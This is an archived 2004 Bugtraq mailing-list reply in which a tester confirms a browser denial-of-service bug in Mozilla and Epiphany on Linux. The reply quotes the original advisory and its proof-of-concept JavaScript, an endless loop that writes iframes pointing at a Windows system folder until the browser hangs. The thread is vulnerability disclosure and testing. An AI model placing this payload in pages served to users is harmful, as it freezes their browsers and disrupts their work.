Re: IE, Firefox, Opera DoS

From: Dan Pixley (danpixley_at_cox.net)
Date: 08/23/04

  • Next message: ktha_at_hush.com: "Re: [ GLSA 200408-19 ] courier-imap: Remote Format String Vulnerability"
    To: exploits@su1d.net, bugtraq@securityfocus.com
    Date: Mon, 23 Aug 2004 13:09:38 +0000
    
    

    Tested this in Mozilla 1.7.2 and Epiphany 1.2.6 in Linux (kernel 2.6.8,
    Gentoo, Gnome 2.6.2).

    Each browser comes up with a warning about running the script. The user
    can chose to run it or not. Either way, a dialog box reloads over and
    over until the main window is forced closed with xkill.

    Dan Pixley

    On Sat, 2004-08-21 at 20:41, exploits@su1d.net wrote:
    > Description
    > ========
    >
    > Browser DoS through viewing of a malicious page that repeatedly loads iframes of C:\Windows\System32 using 100% cpu
    > Tested on Mozilla Firefox 0.9.3, Opera 7.54 and IE 6.0 - Opera gives the error "The address type is unknown or unsupported" over and over
    >
    > POC
    > ===
    > URL : http://www.su1d.net/iframe2.html
    >
    > <scr1pt language="JavaScript">
    > while(true)
    > {
    > document.write("<iframe src=\"C:\Windows\system32\"></iframe>");
    > }
    > </scr1pt>
    > Discovered by MeFakon from the su1d exploit development team
    >


  • Next message: ktha_at_hush.com: "Re: [ GLSA 200408-19 ] courier-imap: Remote Format String Vulnerability"

    Relevant Pages

    • Re: site hacked - can anyone de-code this?
      ... following script that seemed to trigger off a "downloader trojan" warning ... when I inadvertantly opened the page in my browser. ...
      (alt.comp.anti-virus)
    • Sencha Touch--Support 2 browsers in just 228K!
      ... It is advertised as the first "HTML5 framework" based ... very little of the script relates to HTML5. ... several of its key features rely on UA-based browser sniffing. ... iPhone/iPod/iPad devices account for 90% of the mobile market. ...
      (comp.lang.javascript)
    • Re: Sencha Touch--Support 2 browsers in just 228K!
      ... Normalizes currentStyle and computedStyle. ... display style of "none" or any number of possibilities in IE). ... It is not set anywhere in this script. ... browser designs based on retrieving accurate computed style values are ...
      (comp.lang.javascript)
    • Re: Which Is The Better Approach To Working With Javascript?
      ... implementation has no interprocess communication capability, or ability to interface with a script interpreter. ... Java SCRIPT runs in the browser exclusively. ... No language is written just for a single environment. ...
      (comp.lang.php)
    • Re: Absolute element offsets--exercise in futility
      ... browser sniffing in lieu of feature testing. ... implemented in the latest rewrite of jQuery purports only to support ... it is dynamic script injection. ...
      (comp.lang.javascript)